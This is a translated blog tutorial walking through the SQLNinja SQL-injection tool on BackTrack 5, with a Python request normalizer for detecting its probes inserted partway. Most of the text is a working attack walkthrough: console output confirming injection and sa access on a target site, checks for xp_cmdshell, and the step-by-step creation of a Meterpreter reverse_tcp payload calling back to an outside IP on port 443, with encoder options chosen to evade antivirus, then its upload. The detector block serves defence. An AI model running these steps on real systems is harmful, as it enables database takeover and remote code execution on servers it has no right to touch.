
Learning SQLNinja on Back Track 5

Date: 2017/2/28 16:00:42   Editor: Linux教程

I have recently been studying penetration testing on BackTrack 5 and happened to be learning SQLMap and SQLNinja. Below is how SQLNinja is used; for SQLMap, see my earlier post.
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m
Usage: ./sqlninja
-m <mode> : Required. Available modes are:
t/test - test whether the injection is working
f/fingerprint - fingerprint user, xp_cmdshell and more
b/bruteforce - bruteforce sa account
e/escalation - add user to sysadmin server role
x/resurrectxp - try to recreate xp_cmdshell
u/upload - upload a .scr file
s/dirshell - start a direct shell
k/backscan - look for an open outbound port
r/revshell - start a reverse shell
d/dnstunnel - attempt a dns tunneled shell
c/sqlcmd - issue a 'blind' OS command
m/metasploit - wrapper to Metasploit stagers
-f <file> : configuration file (default: sqlninja.conf)
-p <password> : sa password
-w <wordlist> : wordlist to use in bruteforce mode (dictionary method only)
-v : verbose output
-d <mode> : activate debug
1 - print each injected command
2 - print each raw HTTP request
3 - print each raw HTTP response
all - all of the above
...see sqlninja-howto.html for details
There are a lot of parameters above, so let's go through them one by one.
./sqlninja -m loads a mode (module).
Below are some of the mode parameters.
t/test - tests whether the current mode and the configuration file are working properly.
./sqlninja -m test
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !!
OK, the test succeeded: the current injection point is recognized, so an injection vulnerability exists.
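As an added, defender-side example (not from the original post or the sqlninja project): a small Python normalizer that undoes the three evasion layers sqlninja reports above (random URI encoding, comments as separators, hex-encoded query) before matching request lines against the probes the tool issues, such as the 'waitfor delay' test. The request lines, the parameter name id and the indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote

def build_samples() -> list[str]:
    """Constructed request lines (not from the original post). The injected
    values mimic the evasion sqlninja reports: random URI encoding, /**/
    comments as separators and a 0x hex-encoded string literal."""
    hexed = "0x" + b"waitfor delay '0:0:5'".hex()
    return [
        "GET /item.asp?id=12 HTTP/1.1",
        "GET /item.asp?id=12;%57%41%49%54%46%4f%52/**/%44%45%4c%41%59/**/'0:0:5'-- HTTP/1.1",
        f"GET /item.asp?id=12;declare/**/@q/**/varchar(8000);set/**/@q={hexed};exec(@q)-- HTTP/1.1",
        "GET /item.asp?id=12;exec/**/master..xp_cmdshell/**/'hostname'-- HTTP/1.1",
    ]

def normalize(value: str) -> str:
    """Strip the evasion layers so plain keyword rules can see the query."""
    s = value
    for _ in range(3):  # random / nested URI encoding, decode until stable
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # comments used as separators

    def dehex(m: re.Match) -> str:  # 0x... literal -> the text it encodes
        try:
            return bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:
            return m.group(0)
    s = re.sub(r"0x((?:[0-9a-fA-F]{2})+)", dehex, s)
    return re.sub(r"\s+", " ", s).lower()

INDICATORS = [
    ("time-based probe", re.compile(r"\bwaitfor\s+delay\b")),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("dynamic exec", re.compile(r"\bexec\s*\(")),
]

def scan_request(line: str) -> list[str]:
    """Return the indicator names found in one 'METHOD path HTTP/x' line."""
    parts = line.split(" ")
    target = parts[1] if len(parts) >= 3 else line
    norm = normalize(target)
    return [name for name, rx in INDICATORS if rx.search(norm)]

if __name__ == "__main__":
    for req in build_samples():
        print(scan_request(req) or "clean", "<-", req[:70])
```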

f/fingerprint - fingerprint user, xp_cmdshell and more: this determines the database version, the current user, and whether xp_cmdshell exists and can be used.
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
a - All of the above
h - Print this menu
q - exit
>
0 detect the current database version
1 the current database user
2 the current database user's rights
3 check whether xp_cmdshell can be used
4 whether mixed or Windows-only authentication is used
a check all of the above
h show this help menu
q exit
> a
[+] Checking SQL Server version...
Target: Microsoft SQL Server 2000
[+] Checking whether we are sysadmin...
We seem to be 'sa'
[+] Checking whether xp_cmdshell is available
xp_cmdshell seems to be available
Mixed authentication seems to be used
>
m/metasploit uses shellcode from Metasploit. This is not enabled by default; you need to edit the Metasploit setting in sqlninja.conf:
# Path to metasploit executable. Only needed if msfpayload and
# msfcli are not already in the path
msfpath = /pentest/exploits/framework3/ # remove the leading comment marker and change this to where your framework3 is installed
root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m metasploit
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Entering Metasploit module. In order to use this module you need to
have found an available TCP port, either inbound or outbound
[+] Checking Metasploit3 availability....
[+] Which payload you want to use?
1: Meterpreter
2: VNC
>
This runs Metasploit. Because it calls payloads from Metasploit, there are two options: Meterpreter, or a VNC reverse connection. If you are working from a console, Meterpreter is recommended; under GNOME or another windowing environment, VNC is recommended (note that you must have vncserver installed on your own machine; testing showed that the vncserver bundled with Metasploit cannot be called correctly).
OK, let's test both methods. First, Meterpreter.
> 1
[+] Which type of connection you want to use?
1: bind_tcp
2: reverse_tcp
>
Here we choose the connection type: 1 is bind_tcp, which binds a port on the server; 2 is reverse_tcp, which connects back to the local machine. Since the server may be behind a firewall, 2 is generally recommended, but if you have no public IP or public VPN, bind_tcp is recommended.
Here we choose 2.
> 2
[+] Enter local port number
> 443
Here we need to enter a local port; an unused port is recommended. Enter 443.
[+] Choose a payload encoding method
0 - none
1 - Alpha2 Alphanumeric Mixedcase
2 - Alpha2 Alphanumeric Uppercase
3 - Avoid UTF8/tolower
4 - Call+4 Dword XOR
5 - Single-byte XOR Countdown
6 - Variable-length Fnstenv/mov Dword XOR
7 - Polymorphic Jump/Call XOR Additive Feedback
8 - Non-Alpha
9 - Non-Upper
10 - Polymorphic XOR Additive Feedback
11 - Alpha2 Alphanumeric Unicode Mixedcase
12 - Alpha2 Alphanumeric Unicode Uppercase
>
Here you choose the shellcode encoding, mainly to avoid detection by antivirus software on the server. Choose according to the actual situation; I choose 0.
[+] Calling msfpayload3 to create the payload...
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: exitfunc=process,lport=443,lhost=211.45.123.200
[+] Payload (met50838.exe) created. Now converting it to debug script
[+] Uploading /tmp/met50838.scr debug script............
